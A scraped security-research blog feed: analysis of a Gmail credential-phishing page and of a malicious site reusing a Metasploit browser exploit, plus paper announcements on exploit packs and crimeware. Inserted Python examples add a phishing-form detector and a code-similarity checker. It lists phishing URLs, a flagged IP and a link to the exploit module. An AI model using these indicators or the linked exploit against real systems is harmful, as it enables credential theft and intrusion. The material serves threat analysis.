Malicious Check: </div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li>The domain resolves to an IP address which has a history of potentially malicious activity: <a href="https://www.virustotal.com/en/ip-address/79.170.44.127/information/">https://www.virustotal.com/en/ip-address/79.170.44.127/information/</a>. The virtual hosting server has been used for compromised WordPress websites.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: left;">
Overall, basic steps:</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ol>
<li>The user is redirected and served with a gmail.com webpage here: <b>hxxp://www.nusurgix.com/virtusite/phpthumb/serv/Login.htm</b></li>
<li>The form submission sends all the POST data to: <b>hxxp://www.nusurgix.com/virtusite/phpthumb/serv/badu.php</b></li>
<li>The user is then redirected to the legitimate gmail.com webpage: <b>hxxps://accounts.google.com/</b></li>
</ol>
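The three steps above are the signature of a credential harvester: a page that imitates a brand's sign-in form, a password form whose action points at a collector script on the phishing host, and a redirect to the real site afterwards so the victim sees nothing unusual. The Python below is an added example, not code from the original post, of the check a defender can run on a fetched page: parse every form, resolve its action against the page URL (a relative action such as <code>badu.php</code> resolves to the phishing host itself), and report any password form that posts outside the imitated brand's own hosts. The brand allowlist, the page URLs and the HTML are constructed and assumed, modelled on the flow described in the post.

```python
"""Heuristic check for a credential-harvesting login page.

Added example (not the original post's code). Assumptions: the brand
allowlist is illustrative, and the page URLs and HTML below are
constructed samples modelled on the post's three steps.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Hosts that may legitimately receive Google account credentials (assumed allowlist).
BRAND_HOSTS = {"google": {"accounts.google.com"}}
# Words in page text that indicate which brand the page imitates.
BRAND_MARKERS = {"google": ("gmail", "google")}


class FormExtractor(HTMLParser):
    """Collect every <form> with its action and whether it asks for a password."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.text = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "has_password": False,
            }
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None

    def handle_data(self, data):
        self.text.append(data)


def detect_brand(text):
    """Which brand the visible page text claims to be, or None."""
    low = text.lower()
    for brand, markers in BRAND_MARKERS.items():
        if any(m in low for m in markers):
            return brand
    return None


def analyze_login_page(page_url, html):
    """Findings for password forms that post outside the imitated brand's hosts."""
    parser = FormExtractor()
    parser.feed(html)
    brand = detect_brand(" ".join(parser.text))
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        # A relative action resolves against the page URL, i.e. the phishing host.
        target = urljoin(page_url, form["action"])
        parts = urlsplit(target)
        host = (parts.hostname or "").lower()
        if brand and host not in BRAND_HOSTS[brand]:
            findings.append({"brand": brand, "posts_to": target, "host": host,
                             "plaintext": parts.scheme != "https"})
    return findings


# Constructed phishing page: Gmail branding, password form posting to a relative collector script.
PHISH_URL = "http://phish.example/virtusite/phpthumb/serv/Login.htm"
PHISH_HTML = """<html><head><title>Gmail - Sign in</title></head><body>
<h1>Gmail</h1>
<form method="post" action="badu.php">
  <input name="Email"><input type="password" name="Passwd">
  <input type="submit" value="Sign in">
</form></body></html>"""

# Constructed legitimate page for contrast: same brand, form stays on the brand's host.
LEGIT_URL = "https://accounts.google.com/ServiceLogin"
LEGIT_HTML = """<html><head><title>Gmail</title></head><body>
<form method="post" action="/signin/challenge">
  <input name="Email"><input type="password" name="Passwd">
</form></body></html>"""

if __name__ == "__main__":
    print(analyze_login_page(PHISH_URL, PHISH_HTML))
    print(analyze_login_page(LEGIT_URL, LEGIT_HTML))
```

The check only sees the page as served; a kit that builds the form with JavaScript needs the page rendered first, and the brand markers are a deliberately small, assumed list that a production detector would replace with a fuller brand catalogue.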
<br />
<div class="separator" style="clear: both; text-align: left;">
The website is hosted on a CMS hosting server as shown below:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-GHaCEwK7h6A/Uw_ZNrppjXI/AAAAAAAABqE/kvPsuSDEB-w/s1600/gmail_attack_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-GHaCEwK7h6A/Uw_ZNrppjXI/AAAAAAAABqE/kvPsuSDEB-w/s1600/gmail_attack_3.png" height="384" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
Overall, it might not be a sophisticated attack, but a few inferences:</div>
<div>
<ul>
<li>A smart user would have detected that this is a trick even though it was delivered to the inbox.</li>
<li><b>Big issue: the anti-spam solutions in Google's network fail to detect it and mark it as phishing. </b></li>
<li>There is a possibility that a few users have fallen for this trick, but we cannot be sure.</li>
<li>The attacker used compromised network infrastructure to execute this attack: a healthcare provider's hosting account was compromised.</li>
<li>This type of attack, even if it remains active for only a few minutes, could already have garnered a good set of accounts.</li>
</ul>
<div>
Do not fall for this trap !</div>
</div>
Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-27259303621089490162014-01-12T17:18:00.001-08:002014-01-12T17:18:18.722-08:00Virus Bulletin - NiFramer Iframer Injector - CPanel<br />A couple of months earlier, we released a paper on the design of NiFramer, a bash tool that automates iframe injections on compromised servers. It has been used widely by attackers. In the coming time, we will be covering different variants of automated iframe injection tools.<br />
<br />
<br />
<center>
<iframe allowfullscreen="" frameborder="0" height="511" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/29940066" style="border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px;" width="479"> </iframe> <br />
<div style="margin-bottom: 5px;">
</div>
</center>
<center style="text-align: left;">
You can download the paper at: <a href="http://secniche.org/released/VB_CPANEL_IFRAME_INJECT.pdf" target="_blank"><b>http://secniche.org/released/VB_CPANEL_IFRAME_INJECT.pdf</b></a></center>
Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-18900959151622367842013-11-05T19:32:00.001-08:002013-11-05T19:32:38.739-08:00Virus Bulletin : Analysis of Styx Exploit Pack <div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-gziGn9kh7sE/Unm4CGFCQKI/AAAAAAAABmM/E5g3New08YQ/s1600/ferryman_on_river_styx_by_skeletalcloset-d3j1xpq.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://4.bp.blogspot.com/-gziGn9kh7sE/Unm4CGFCQKI/AAAAAAAABmM/E5g3New08YQ/s200/ferryman_on_river_styx_by_skeletalcloset-d3j1xpq.jpg" width="160" /></a></div>
We released a paper in Virus Bulletin Magazine on the design analysis of Styx exploit pack.<br />
<br />
" In this paper, we discuss the details and design of the Styx exploit pack. According to the dictionary, Styx is a river in the underworld, over which Charon ferried the souls of the dead. According to the Styx service provider website, ‘Styx is a river in Greek mythology that formed the boundary between earth and the underworld... It circles the underworld nine times.’ So it seems that the origin of the name is as rigorous as the exploit pack itself."<br />
<br />
Download the paper from here:<b> <a href="http://secniche.org/released/VB_Styx_Exploit_Pack.pdf">http://secniche.org/released/VB_Styx_Exploit_Pack.pdf</a></b><br />
<br />Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-88266939480161867672013-09-13T13:53:00.002-07:002013-09-13T13:55:24.218-07:00CrossTalk Paper - The Art of Cyber Bank Robbery !<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.crosstalkonline.org/storage/issue-archives/2013/201309/201309-0-Cover-200.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://www.crosstalkonline.org/storage/issue-archives/2013/201309/201309-0-Cover-200.jpg" width="156" /></a></div>
We released a new paper to provide insights into the cyber bank robbery model adopted by cyber criminals.
<br />
<br />
<center>
<iframe allowfullscreen="" frameborder="0" height="511" marginheight="0" marginwidth="0" mozallowfullscreen="" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/26178793" style="border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px;" webkitallowfullscreen="" width="479"> </iframe> <div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/adityaks/crosstalk" target="_blank" title="CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insidious Attacks !">CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insidious Attacks !</a> </strong> </div>
</center>
<br />
Download paper : <a href="http://www.crosstalkonline.org/storage/issue-archives/2013/201309/201309-Sood.pdf">http://www.crosstalkonline.org/storage/issue-archives/2013/201309/201309-Sood.pdf</a>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-33027963768748858672013-06-10T16:58:00.001-07:002013-06-10T17:05:15.890-07:00ToorCon 14 Slides : Malandroid : The Crux of Android Infections<br />Just uploaded the deck of slides used in the talk that I presented at <b>ToorCon 14 Security conference</b> in San Diego.<br />
<br />
<center>
<iframe allowfullscreen="" frameborder="0" height="356" marginheight="0" marginwidth="0" mozallowfullscreen="" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/22770073" style="border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px;" webkitallowfullscreen="" width="427"> </iframe> <div style="margin-bottom: 5px;">
<strong> <a href="http://www.slideshare.net/adityaks/android-malware-presoversion02" target="_blank" title="ToorCon 14 : Malandroid : The Crux of Android Infections">ToorCon 14 : Malandroid : The Crux of Android Infections</a> </strong><br />
<br />
<div style="text-align: left;">
Abstract: The Android platform has been plagued by malware for the past several years. Despite all attempts to detect and mitigate malicious applications on Android, malware is still flying under our radar and getting on our devices and causing millions of users financial and data loss every year. Additionally, the malware analysis community is at a large disagreement on how Android malware should be classified. In this talk, we’ll dive into the tactics, tools and procedures used by Android malware today, including several case studies of exceptional malware samples. By analyzing real code used by malware in the wild, we’ll be able to show the advancements in Android malware from a design perspective.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-GLC5ytsm_IM/UbZpIUcikCI/AAAAAAAABds/6ORUcpGhoqU/s1600/tc14badge.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-GLC5ytsm_IM/UbZpIUcikCI/AAAAAAAABds/6ORUcpGhoqU/s320/tc14badge.jpeg" width="240" /></a></div>
Enjoy !</div>
</div>
</center>
Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-8748710435737068202013-05-20T03:57:00.000-07:002013-06-10T16:41:19.222-07:00Contrarisk Security Podcast: A look into Socioware !<div class="separator" style="clear: both; text-align: center;">
</div>
I recently did a podcast on the Socioware with Steve from Contrarisk.<br />
<br />
"Microsoft recently warned about Man in the Browser (MitB) malware exploiting Facebook sessions. When a user is infected – often by drive-by downloads on infected or malicious sites – the malware uses authenticated sessions on Facebook to post messages, ‘like’ pages and get up to general mischief."<br />
<br />
Listen to the podcast here: <a href="http://contrarisk.com/2013/05/19/csp-0011/"><b>http://contrarisk.com/2013/05/19/csp-0011/</b></a>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-86833580745140229512013-03-26T20:13:00.001-07:002013-04-01T16:35:38.180-07:00Malware Retrospective - Infected Chinese Servers Deploy Metasploit Exploits<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-LtDqp1Ldudg/TcGR4TDXYnI/AAAAAAAAFtc/5BwArQ9VW2Y/s400/Metasploit+Framework+3.7.0+Released+Download+Free+Metasploit+Latest+Version.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://4.bp.blogspot.com/-LtDqp1Ldudg/TcGR4TDXYnI/AAAAAAAAFtc/5BwArQ9VW2Y/s200/Metasploit+Framework+3.7.0+Released+Download+Free+Metasploit+Latest+Version.jpg" width="166" /></a></div>
It's been a while since our team blogged about malware and other interesting information. Today, we got some time to talk about one of the cases we analyzed while testing a few tools of our own. We prefer to construct custom scripts and tools to automate the process of web malware analysis. Recently, we tested one of them, a simple parser which fetches the scripts, iframes and embed tags present in remote web pages for faster analysis. We came across a set of malicious domains serving an exploit that used a JavaScript heap spraying technique to execute its payload through a drive-by download attack. That is a common technique of silent browser exploitation; what was not common is the issue discussed below.<br />
<br />
The malware domain was hosting an exploit for MS12-043, Microsoft XML Core Services (MSXML) Uninitialized Memory Corruption. More details can be read here: <b><a href="http://support.microsoft.com/kb/2722479" target="_blank">MS12-043</a>. </b>Unsurprisingly, the IP address of that domain belonged to China, as shown below:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-7GU_ce1doY0/UUferJ0jveI/AAAAAAAABak/JTYnHwbY_vI/s1600/china_ip_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="http://3.bp.blogspot.com/-7GU_ce1doY0/UUferJ0jveI/AAAAAAAABak/JTYnHwbY_vI/s640/china_ip_1.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: left;"><br /></td></tr>
</tbody></table>
Our surprise did not end here. As the exploit for this vulnerability was released last year, we were interested in checking how the exploit code was structured. When the exploit code was traced, it was quite a shock: the Chinese domain used the same exploit code hosted in the Metasploit repository for this vulnerability. Now the question: is it possible that Chinese malware authors simply deploy Metasploit exploits for an easy infection process? It could be. Who knows whether the domain was compromised by Chinese actors or belonged to others. It is hard to say who hosted that malware, but clearly the servers were present in China.<br />
<br />
The exploit for this vulnerability can be found in Metasploit here: <b><a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb" target="_blank">https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb</a>.</b><br />
<b><br /></b>
A simple comparison of one of the code snippets used on the malware domain with the legitimate Metasploit repository is shown below:<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-LFIBGivEKMk/UUfmAB2LqmI/AAAAAAAABas/4CA33VuCm_A/s1600/china_exp_meta.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="http://1.bp.blogspot.com/-LFIBGivEKMk/UUfmAB2LqmI/AAAAAAAABas/4CA33VuCm_A/s640/china_exp_meta.png" width="640" /></a></div>
<br />
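The comparison above is a visual one. When an analyst wants to establish whether in-the-wild code is a copy of a public repository module, the usual obstacles are renamed variables, re-flowed whitespace, added comments and changed string contents, all of which defeat a plain diff. The Python below is an added example, not code from the original post, of a provenance check that normalises both snippets (identifiers renamed in order of first use, string literals collapsed, comments stripped) before measuring token-level similarity. The three JavaScript snippets in it are constructed, harmless stand-ins for the exploit code the post compares; the technique, not the content, is the point.

```python
"""Normalised similarity between two JavaScript snippets.

Added example (not the original post's code). SNIPPET_A stands in for the
public repository copy, SNIPPET_B for a lightly reworked in-the-wild copy and
SNIPPET_C for unrelated code; all three are constructed and harmless.
"""
import re
from difflib import SequenceMatcher

KEYWORDS = {"function", "var", "let", "const", "for", "while", "do", "if", "else",
            "return", "new", "this", "true", "false", "null", "typeof", "in",
            "break", "continue", "switch", "case", "try", "catch", "throw"}

TOKEN = re.compile(r"""
    "(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'    # string literals
    |\d+(?:\.\d+)?                         # numbers
    |[A-Za-z_$][\w$]*                      # identifiers and keywords
    |\+\+|--|&&|\|\||[-+*/%<>=!]=?         # multi-character operators
    |\S                                    # any other single character
    """, re.VERBOSE)


def normalize(src):
    """Token stream with identifiers renamed ID0, ID1, ... in order of first use
    and string literals collapsed to STR. Assumes string literals contain no
    comment markers (comments are stripped before tokenising)."""
    src = re.sub(r"//[^\n]*|/\*.*?\*/", " ", src, flags=re.S)
    ids, out = {}, []
    for tok in TOKEN.findall(src):
        if tok[0] in "\"'":
            out.append("STR")
        elif re.match(r"[A-Za-z_$]", tok) and tok not in KEYWORDS:
            out.append(ids.setdefault(tok, f"ID{len(ids)}"))
        else:
            out.append(tok)
    return out


def similarity(a, b):
    """Ratio in [0, 1] over the normalised token streams."""
    return SequenceMatcher(None, normalize(a), normalize(b)).ratio()


def raw_similarity(a, b):
    """Character-level ratio on the untouched sources, for comparison."""
    return SequenceMatcher(None, a, b).ratio()


# Constructed reference snippet (stands in for the repository copy).
SNIPPET_A = 'function fill(n){ var s = ""; for (var i = 0; i < n; i++) { s += "a"; } return s; }'
# Constructed copy with renamed identifiers, re-flowed layout and a comment.
SNIPPET_B = """// helper
function xYz(count)
{
  var out = "";
  for (var k = 0; k < count; k++) out += "a";
  return out;
}"""
# Constructed unrelated snippet.
SNIPPET_C = "var total = 0; while (total < 10) { total = total * 2 + 1; } alert(total);"

if __name__ == "__main__":
    print(f"A vs B: raw={raw_similarity(SNIPPET_A, SNIPPET_B):.2f} "
          f"normalised={similarity(SNIPPET_A, SNIPPET_B):.2f}")
    print(f"A vs C: normalised={similarity(SNIPPET_A, SNIPPET_C):.2f}")
```

A high normalised score with a low raw score is exactly the pattern of a lifted-and-renamed module; a kit author who also reorders statements or splits functions would still push the score down, so the ratio is a triage signal rather than proof.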
The exploit code was used in conjunction with the JS code hosted here: <a href="http://js.users.51.la/15240615.js">http://js.users.51.la/15240615.js</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Lu-sScXAUWQ/UUfpSCrf8hI/AAAAAAAABa0/M6Dq7Wm9bkE/s1600/china_exp_meta_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="http://3.bp.blogspot.com/-Lu-sScXAUWQ/UUfpSCrf8hI/AAAAAAAABa0/M6Dq7Wm9bkE/s640/china_exp_meta_1.png" width="640" /></a></div>
<br />
<br />
This code dynamically collects information about the visitor and creates log entries for statistical purposes.<br />
<br />
We remember that a few traces were detected earlier where the Phoenix exploit kit used one of the same exploits present in Metasploit. Refer: <b>Gangsterware</b>.<br />
<br />
The conclusive points are:<br />
<br />
<ul>
<li>Metasploit provides neat exploits which are easy to deploy and use.</li>
<li>The evidence shows that malware authors are using Metasploit exploits.</li>
</ul>
<br />
Well, Reality bites !Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-3137812299142141862013-03-05T08:28:00.000-08:002013-03-05T08:28:43.619-08:00VB Magazine - A Look into Sweet Orange and Propack Exploit Pack<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.virusbtn.com/images/structure/logo.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://www.virusbtn.com/images/structure/logo.gif" /></a></div>
We have just released our thoughts on "Sweet Orange" and "ProPack" exploit packs in VB magazine this month.<br />
<br />
"Blackhole has been the major player in the exploit kit market for a while now, but the Sweet Orange and ProPack kits have recently entered the market and are rapidly gaining in popularity. Aditya Sood and colleagues take a look at advancements in the design of the new kits on the block."<br />
<br />
Refer: <b><a href="http://www.virusbtn.com/virusbulletin/archive/2013/03/vb201303-SweetOrange-ProPack" target="_blank">http://www.virusbtn.com/virusbulletin/archive/2013/03/vb201303-SweetOrange-ProPack</a></b><br />
<br />
Enjoy !Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-12102587923292163322013-02-13T10:09:00.001-08:002013-02-13T10:12:39.290-08:00IEEE Security and Privacy Magazine - Targeted Cyber Attacks Paper<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.computer.org/portal/image/image_gallery?uuid=2e88a1f7-5a05-4cfd-8810-f221e62ce6a9&groupId=889144&t=1360263385342" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://www.computer.org/portal/image/image_gallery?uuid=2e88a1f7-5a05-4cfd-8810-f221e62ce6a9&groupId=889144&t=1360263385342" width="146" /></a></div>
<br />
Our paper on targeted attacks is out in IEEE Security and Privacy Magazine.<br />
<br />
"Targeted cyber attacks play an increasingly significant role in disrupting the online social and economic model, not to mention the threat they pose to nation-states. A variety of components and techniques come together to bring about such attacks"<br />
<br />
Refer here: <a href="http://www.computer.org/csdl/mags/sp/2013/01/msp2013010054-abs.html">http://www.computer.org/csdl/mags/sp/2013/01/msp2013010054-abs.html</a><br />
<br />
Enjoy !Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-77059322474796366012013-02-06T20:43:00.000-08:002013-02-06T20:48:20.181-08:00Elsevier IJCIP - Crimeware-as-a-service – A survey of commoditized crimeware in the underground market<div class="separator" style="clear: both; text-align: center;">
<a href="http://ars.els-cdn.com/content/image/S18745482.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://ars.els-cdn.com/content/image/S18745482.gif" /></a></div>
Our paper on Crimeware-as-a-Service (CaaS) has been accepted for publication in Elsevier's Journal of Critical Infrastructure Protection and is available at <b><a href="http://www.sciencedirect.com/science/article/pii/S1874548213000036" target="_blank">http://www.sciencedirect.com/science/article/pii/S1874548213000036</a>.</b><br />
<b><br /></b>
<b>Abstract: </b>Crimeware-as-a-Service (CaaS) has become a prominent component of the underground economy. CaaS provides a new dimension to cyber crime by making it more organized, automated, and accessible to criminals with limited technical skills. This paper dissects CaaS and explains the essence of the underground economy that has grown around it. The paper also describes the various crimeware services that are provided in the underground market.Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-14362019466781275102013-01-30T08:53:00.002-08:002013-01-30T08:57:51.221-08:00IEEE Internet Computing - Dissecting the State of Underground Enterprise<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-VmcikH1jC20/UQlNXPWGGhI/AAAAAAAABZo/5WTyD1p4YJU/s1600/ieee_ic.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-VmcikH1jC20/UQlNXPWGGhI/AAAAAAAABZo/5WTyD1p4YJU/s1600/ieee_ic.png" /></a></div>
Our paper on "Dissecting the State of Underground Enterprise" is finally out in IEEE Internet Computing.<br />
<br />
<span style="font-family: 'Times New Roman', serif; font-size: 12pt; line-height: 115%;">Abstract: "Cybercrime's tentacles reach deeply
into the Internet. A complete, underground criminal economy has developed that
lets malicious actors steal money through the Web. The authors detail this
enterprise, showing how information, expertise, and money flow through it.
Understanding the underground economy's structure is critical for fighting
it."</span><br />
<div class="MsoNormal">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; line-height: 115%;">It's available here: <b><a href="http://www.computer.org/csdl/mags/ic/2013/01/mic2013010060-abs.html" target="_blank">http://www.computer.org/csdl/mags/ic/2013/01/mic2013010060-abs.html</a>.</b></span></div>
<div class="MsoNormal">
<br /></div>
Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-32661698982354323132013-01-27T16:58:00.002-08:002013-01-27T21:25:35.616-08:00Hack In The Box (HitB) Magazine : A Journey of Learning and Sharing<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-tr84K88rrQ8/UQXJO2PGY9I/AAAAAAAABZQ/JphiqP2vhgA/s1600/hitb_mag.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="86" src="http://4.bp.blogspot.com/-tr84K88rrQ8/UQXJO2PGY9I/AAAAAAAABZQ/JphiqP2vhgA/s400/hitb_mag.png" width="400" /></a></div>
I finally got some time to talk about my (and other team members') journey as a contributor and author for the Hack-in-the-Box (HitB) magazine. At this point, the HitB ezine has completed more than two years. It's been a great time working with the HitB crew, especially <b>Zarul </b>and <b>Dhillon.</b> In addition, Mateusz “j00ru” Jurczyk and Gynvael Coldwind are also contributing a lot. I have been writing for this magazine right from the first edition, and it has been a great time of sharing and learning in the last two years. I want to talk about the content that I have written in the last nine editions with support from my different colleagues.<br />
<br />
<b>Edition 1: (Paper) - Malware Obfuscation: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-001.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-001.pdf</a> - </b>The first edition was released in January 2010. In this edition, I wrote a paper with Wayne Huang of Armorize on malware obfuscation tactics, with additional support from Fyodor Yarochkin. We discussed several malware obfuscation tactics and how to deobfuscate them manually.<br />
<br />
<b>Edition 2: (Paper) - Open Redirect Wreck Off - Web Traffic Forwards: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-002.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-002.pdf</a> - </b>The second edition was released in April 2012. In this edition, I presented the complete details of traffic redirection in web applications and websites, using real-world code snippets collected during open research.<br />
<br />
<b>Edition 3: (Paper) - Chinese Malware Factory - Paradox of MS Office Based Malware: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-003.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-003.pdf</a> - </b>The third edition came out in July 2010. In this edition, I wrote about my research on MS Office based Chinese malware that uses Word, Excel, etc. files to spread malicious code by exploiting inherent vulnerabilities in the requisite software component.<br />
<b><br /></b>
<b>Edition 4: (Paper) - Notorious Data-center Support Systems: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-004.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-004.pdf</a> - </b>The fourth edition came out in October 2010. In this edition, I wrote a collaborative paper with my colleague Rohit Bansal on vulnerabilities present in support center web applications that can directly result in gaining access to different virtual hosts.<br />
<br />
<b>Edition 5: (Paper) - Exploiting Web Virtual Hosting - Malware Infections: </b><a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-005.pdf" style="font-weight: bold;">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-005.pdf</a><b> - </b>The fifth edition was released in February 2011. In this edition, I wrote a paper collaboratively with my colleague Rohit Bansal and my adviser Dr. Enbody, presenting techniques for infecting virtual hosts present on the same host.<br />
<br />
<b>Edition 6: (Paper) - Botnet Resistant Coding: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-006.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-006.pdf</a> -</b> The sixth edition came out in June 2011. I released a paper with my colleagues Peter Greko and Fabian and my adviser Dr. Enbody on the concept of botnet resistant coding. In this edition, we talk about a generic coding approach to subvert the automated log harvesting process in C&C panels.<br />
<br />
<b>Edition 7: (Paper) - Extending SQL Injections using Buffer Overflows: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-007.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-007.pdf</a> - </b>The seventh edition was released in October 2011. In this edition, I wrote another paper collaboratively with my colleague Rohit Bansal and my adviser Dr. Enbody on exploiting blind SQL injections in web applications that return a 500 error, by using a buffer overflow technique. This tactic was developed by Rohit himself.<br />
<br />
<b>Edition 8: (Paper) - Exploit Distribution Mechanism in Browser Exploit Packs: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-008.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-008.pdf</a> - </b>The eighth edition came out in April 2012. In this edition, I wrote collaboratively with Dr. Enbody on the techniques of exploit distribution in browser exploit packs such as BlackHole, Phoenix, etc.<br />
<br />
<b>Edition 9: (Paper) - Game of Windows 32/64 System Takeover - Bot Wars : <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-009.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-009.pdf</a> - </b>The ninth edition was released in November 2012. I detailed the concept of bot wars, in which one bot kills another to gain complete access to the infected system.<br />
<b><br /></b>
HitB Magazine is a great place to talk about hacking techniques. I hope this continues and I wish to contribute more in the coming time.<br />
<br />
<b>So, Hack the Box. Cheers ! </b><br />
Aditya K Sood (http://www.blogger.com/profile/10592122467317696329)<br />
<br />
<b>Virus Bulletin Papers Added to Repository</b> (published 2013-01-09T09:17:00.001-08:00, updated 2013-01-09T09:17:03.663-08:00)<br />
We have added the papers to our repository. The newly added ones are:<br />
<br />
1. ICE IX Analysis: <a href="http://secniche.org/released/VB_ICE_IX.pdf" target="_blank"><b>http://secniche.org/released/VB_ICE_IX.pdf</b></a><br />
<br />
2. Winlocker Ransomware Analysis: <b><a href="http://secniche.org/released/VB_WINLOCKER.pdf" target="_blank">http://secniche.org/released/VB_WINLOCKER.pdf</a></b><br />
<br />
3. Malware Strategies - Part 1: <a href="http://secniche.org/released/VB_MAL_DET_STR_PART1.pdf" target="_blank"><b>http://secniche.org/released/VB_MAL_DET_STR_PART1.pdf</b></a><br />
<br />
4. Malware Strategies - Part 2: <b><a href="http://secniche.org/released/VB_MAL_DET_STR_PART2.pdf" target="_blank">http://secniche.org/released/VB_MAL_DET_STR_PART2.pdf</a></b><br />
<br />
Enjoy !<br />
